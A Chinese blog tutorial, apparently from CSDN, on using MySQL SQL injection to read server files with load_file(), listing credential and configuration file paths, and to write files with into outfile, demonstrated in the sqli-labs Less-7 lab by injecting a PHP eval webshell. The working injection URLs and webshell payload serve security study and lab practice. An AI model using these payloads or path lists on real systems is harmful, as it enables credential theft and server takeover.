sql注入中的文件导入导出问题

最新推荐文章于 2022-01-22 16:50:26 发布
最新推荐文章于 2022-01-22 16:50:26 发布
阅读量392 收藏
点赞数
分类专栏: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42350229/article/details/104077933
版权

导入和导出

load_file()导出文件

load_file(file_name): 读取文件并返回该文件的内容作为一个字符串

使用条件:

  • 必须有权限并且文件必须完全可读

    and (select count(*) from mysql.user)>0/\*如果返回正常,说明有读写权限

    and (select count(*) from mysql.user)>0/\* 如果返回错误,管理员给数据库账户降权了

  • 要读取的文件必须在服务器上

  • 必须指定文件的完整路径

  • 要读取的文件必须小于max_allowed_packet

    如果文件不存在,或因为上面的任一原因而不能读出,函数返回空… 比较难满足的就是权限,在windows下,ntfs设置得当,是不能读取相关的文件的,只当遇到只有administrators才能访问的文件,users是load_file不出来的.

实际注入中:

​ 绝对物理路径

​ 构造有效的畸形语句(报错爆出绝对路径)

在很多php程序中,当提交一个错误的Query,如果display_errors=on 程序就会暴露web目录的绝对路径,只要知道路径就好

常用路径:


WINDOWS下:

c:/boot.ini //查看系统版本

c:/windows/php.ini //php配置信息

c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码

c:/winnt/php.ini

c:/winnt/my.ini

c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码

c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码

c:\Program Files\Serv-U\ServUDaemon.ini

c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置

c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码

c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此

c:\Program Files\RhinoSoft.com\ServUDaemon.exe

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件

//存储了pcAnywhere的登陆密码

c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf //查看WINDOWS系统apache文件

c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.

c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

d:\APACHE\Apache2\conf\httpd.conf

C:\Program Files\mysql\my.ini

C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
LUNIX/UNIX 下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件

/usr/local/apache2/conf/httpd.conf

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/usr/local/app/php5/lib/php.ini //PHP相关设置

/etc/sysconfig/iptables //从中得到防火墙规则策略

/etc/httpd/conf/httpd.conf // apache配置文件

/etc/rsyncd.conf //同步程序配置文件

/etc/my.cnf //mysql的配置文件

/etc/redhat-release //系统版本

/etc/issue

/etc/issue.net

/usr/local/app/php5/lib/php.ini //PHP相关设置

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

示例:

select 1,2,3,4,5,6,7,hex(replace(load_file(char(99,58,92,119,105,110,100,111,119,115,92, 114,101,112,97,105,114,92,115,97,109))))

利用hex()将文件内容导出来,尤其是smb文件时

-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

其中的char()就是"c:/boot.ini"的ascii码

-1 union select 1,1,1,loadfile(0x633a2f626f6f742e696e6

Explain:“c:/boot.ini”的 16 进制是“0x633a2f626f6f742e696e6

-1 union select 1,1,1,load_file(c:\\boot.in

Explain:路径里的/用 \\ 代替

文件导入到数据库

load data infile 语句用于高速地从一个文本文件中读取行, 并装入一个表中. 文件名称必须为一个文字字符串.

在注入的过程中, 我们需要一些特殊的文件, 比如配置文件, 密码文件. 需要数据库权限的时候, 可以将系统文件利用load data infile 导入到数据库中.

示例:

load data  infile '/tmp/t0.txt' ignore into table t0 character set gbk fields terminated by '\t' lines terminated by '\n'

将/tmp/t0.txt导入到t0表中, character set gbk 是字符集设置为gbk , fields terminated by 是每一项数据之间的分隔符, lines terminated by 是行的结尾符.

当错误代码为2的时候,文件不存在, 错误代码为13的时候是没有权限的, 可以考虑/tmp等文件夹(load xml 是否可以用来做注入还需要验证)

导入到文件

select ... into outfile 'file_name'

可以把被选择的行写入到一个文件中, 该文件被创建到服务器主机上, 因此必须拥有权限才能完成词语发. file_name 不能是一个已经存在的文件.

一般有两种利用形式

  1. 直接将select 内容导入到文件中

    select version() into outfile “/var/www/html/test.php”

    可以将verison()换成想要的一句话木马<?php @eval($_post['cmd'])?>除了一句话木马还有很多东西

  2. 修改文件结尾:

    select version() into outfile "/var/wwww/html/test.php" LINES TERMINATED BY 0x16进制文件

    通常是用’\r\n’结尾, 此处我们修改为自己想要的任何文件. 同时利用FIELDSTERMINATED BY 16进制可以为一句话或者任何其他代码, sqlmap 采取的就是这样的方式, 参考文章

    http://www.cnblogs.com/lcamry/p/5505110.html

os-shell 限制条件: 1. 网站必须是root权限 2. 攻击者知道网站的绝对路径 3. GPC为off ,PHP主动转义功能关闭

注意点

  1. 可能在文件路径当中要注意转义, 要看具体的环境

  2. load_file()当前台无法导出数据的时候, 我们可以利用下面的语句

    select load_file('c:\\wamp\\bin\\mysql\\mysql5.6.17\\my.ini') into outfile 'c:\\wamp\\www\\test.php'

    可以利用该语句将服务器当中的内容导入到web服务器下的目录, 这样就可以得到数据. 上述my.ini当中存在password项(默认被注释), 当然会有很多内容可以被导出来

Less-7

利用文件导入的方式进行注入, 查看源码判断注入点.


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; // '))闭合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

<http://127.0.0.1/Less-7/index.php?id=1%27))%20union%20select%201,2,3%20into%20outfile%20%22/var/www/html/test.txt%22%20%23>

通过这个进行写入, 在进行操作的时候要确认好, 该目录下是否有写入权限, 一般情况下/tmp是可以写入的, 权限比较大, 为了本地可以演示成功, 这里直接赋予相应目录下全部权限

root@0f6ef9cf6a68:/var/www# ls -al
total 20
drwxr-xr-x 1 root root 4096 Dec 16  2015 .
drwxr-xr-x 1 root root 4096 Dec 16  2015 ..
drwxrwxrwx 1 root root 4096 Jan 23 13:00 html // chmod 777 html

http://127.0.0.1/test.txt //目录访问成功

1	Dumb	Dumb
1	2	3

接下来直接导入一句话木马

http://127.0.0.1/Less-7/index.php?id=1%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%22cmd%22])?%3E%27%20into%20outfile%20%22/var/www/html/test.php%22%20%23

这里的一句话要用’'里面, ""似乎不行,不知道为什么

写入成功

root@0f6ef9cf6a68:/var/www/html# more test.php 
1	Dumb	Dumb
1	2	<?php @eval($_POST["cmd"])?>

页面访问

<http://127.0.0.1/test.php>

1 Dumb Dumb 1 2

访问成功.

接下来用shell链接工具链接就好了cknife 菜刀 甚至自己写python脚本都可以

简书
个人博客

Pito
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超级SQL注入工具使用说明书V201512271
08-08
- **导出配置**:将当前配置保存为XML文件,便于后期导入使用。 4. **注入心**: - **数据包配置**:用户可以手动输入URL或使用抓包工具填充数据包。 - **注入设置**:根据需要调整注入策略,如开启URL编码等...
如何学习SQL注入基础以及深入研究
weixin_43639741的博客
05-20 911
NetSPI SQL Injection Wiki<SQL注入学习基础篇> 这个wiki的使命是成为一站式资源,用于在各种数据库管理系统(DBMS)完全识别,利用和升级SQL注入漏洞。这个wiki假设您对SQL注入有基本的了解。 如果你英语不好推荐使用Google浏览器的网页翻译插件,可以自动翻译 但是如果你需要阅读SQL语句,推荐改为英文阅读即可 已文翻译 未翻译 该WI...
SQL注入漏洞攻击、数据库导入导出[从txt导入导出]
zhanglan478950的专栏
11-27 1321
1.SQL注入漏洞攻击 protected void Button1_Click(object sender, EventArgs e) { string constr = "data source=pc-20120907sdqu;initial catalog=shool;user id=sa;password=admin"; usi
mysql loadfile 快速导入导出数据
zyn_zyn_zyn的专栏
06-28 240
格式: C:\Documents and Settings\eelly&gt;mysql -u账号 -p密码 --default-character-set=utf8 数据库&lt;d:\t\mall_ecm_order_extm.sql 例如: C:\Documents and Settings\eelly&gt;mysql -uroot -proo --default-ch...
mysql infile/outfile 导入导出
写博客只为学习
04-11 1897
第一种方式:通过SELECT 语句以及 LOAD FILE来导出导入文本文件 这种方式不会引起行锁定。 命令: SELECT * INTO OUTFILE 'D:/sql/test.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' ESCAPED BY '"' FROM test; 说明: --
SQL注入文件导入导出
Pz_mstr's Blog
09-04 1822
一、前言 继续深入学习SQL注入 二、背景 通过SQL注入,我们不仅可以获取数据库内容,还可以通过具有一定权限的数据库用户,对操作系统进行操作,本文讲的就是文件系统进行的操作。 三、前置知识 本部分参考lcamry先生的《SQL注入天书》的background 3 相关操作函数 1.load_file()导出文件 Load_file(file_name):读取文件并返回该文件
SQL Server数据库重命名、数据导出的方法说明
01-19
第一个问题是重命名数据库问题:在企业管理器是无法直接对数据库重命名的,只能在查询分析器操作 代码如下:create proc killspid (@dbname varchar(20)) as begin declare @sql nvarchar(500),@temp ...
向数据库以Excel形式导入导出
12-23
需要注意的是,这种直接将字符串拼接成SQL语句的方法存在SQL注入的风险,实际开发应使用参数化查询或存储过程来提高安全性。此外,为了提高性能,可以考虑使用SqlBulkCopy类进行大量数据的批量导入。 在完成数据...
C#操作Excel(导入导出
08-31
在C#编程,处理Excel文件通常是为了数据导入导出的需求。在给定的代码示例,展示了如何使用C#操作Excel进行数据的读取和写入,主要依赖于.NET Framework的`OleDb`组件,通过Jet OLEDB提供程序与Excel文件...
Mysql注入的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们...
sql注入总结(2)--------导入导出文件操作
Z_Grant的博客
09-10 763
文章目录一,爆出绝对路径二,导出文件(1) load_file()函数三,上传文件(1) into outfile {绝对路径} 一,爆出绝对路径 这个方法有不少,需要花时间去研究学习,但这是文件导入导出的关键步骤 二,导出文件 (1) load_file()函数 Load_file(”file_name“): 使用条件: ①必须有权限读取并且文件必须完全可读 ②欲读取文件必须在服务器上 ③必...
MySQL-SQL注入导入导出
MinggeQingchun的博客
01-22 562
一、MySQL 及 SQL 注入 SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令 以下实例,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间 if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches)){ $result = mysqli_query($conn, "SELECT * FROM users
SQL注入(二)
_Ralph的博客
01-16 276
1.利用正则注入 and length(database())=6 --+ 判断当前数据库名字长度 and 1=(database() regexp '^securit[a-z]') 猜当前数据库名字(首先要知道长度) and (select 1 from information_schema.tables where table_schema=database() an
Background-3 导入导出相关操作的讲解
lixiangminghate的专栏
06-02 521
1.load_file()导出文件Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。使用条件:A、必须有权限读取并且文件必须完全可读      and (select count(*) from mysql.user)&gt;0/* 如果结果返回正常,说明具有读写权限。     and (select count(*) from mysql.user)&gt;0/...
sqli-labs闯关随记
weixin_44576725的博客
11-11 1490
前言:做了sqli-labs的接近三十关,在这里简单做个总结,以下是自己在闯关所学到的知识,包括在网上查询、参考别人文章以及资料所理解到的。这个随记比较杂乱,都是我边学边写的,希望大家凑合着看哈。会不定时更新,如果后面内容较多,会考虑分为上下篇。 1、sql注入分类 基于从服务器接收到的响应: 基于错误的sql注入 联合查询的类型 堆查询注射 sql盲注: 基于布尔sql盲注 基于时间的sql盲注 基于报错的sql盲注 基于如何处理输入的sql查询(数据类型): 基于字符串 数字或证书为基础
mysql注入 outfile_<转>Mysql注入into outfile和load_file()总结
weixin_39705435的博客
01-19 253
(1)outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径。这个问题在php注入更加麻烦,因为会自动将单引号转义成\',那么基本没的玩了。唯一的一种可能就是你使用mysql远程连接,然后直接在mysql执行命令,就没有查询限制了。当然,你要是找到了phpmyadmin,也可以。(2)load_file,后面的路径可以是单引号、0x、char转换的字符。这而记得路径的斜...
MYSQL注入load_file()函数的进一步应用
收集盒 Book box
09-06 1802
文章已发表于《黑客防线》2008年第11期 转载请注明 MYSQL注入,load_file()函数在获得webshell以及提权过程起着十分重要的作用,常被用来读取各种配置文件,如: /usr/local/app/apache2/conf/httpd.conf //apa
Mysql注入学习笔记
xj28555的博客
06-25 2131
MYSQL注入 函数 version()——MySQL 版本 user()——数据库用户名 database()——数据库名 @@datadir——数据库路径 @@version_compile_os——操作系统版本 information_schema 自带数据库 information_schema.schemata 数据库 information_schema.tables 数据表 information_schema.columns 数据列 floor函数返回小于等于该值的最大整数 RAND()
4 读写文件_WEB安全之SQL注入(4)——读写文件
weixin_28787725的博客
01-13 95
大家好,我是阿里斯,一名IT行业小白。今天为大家分享的内容是利用注入进行文件的读写,这里主要是两个函数,load_file() 和into outfile 希望能帮助小白,也能帮助已经遗忘的你。load_file()和into outfile使用前提有读/写权限有绝对路径secure_file_priv 的值不为null注入时需要能够使用select语句引号能否使用数据库测试使用load...
SQLite文件数据库、内存数据库使用C++建立及导入导出
最新发布
05-24
SQLite是一种轻量级关系型数据库管理系统,它支持文件数据库和内存数据库。以下是使用C++建立SQLite文件数据库、内存...同时需要注意使用sqlite3_exec函数执行SQL语句时,应该避免拼接字符串产生SQL注入等安全问题

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值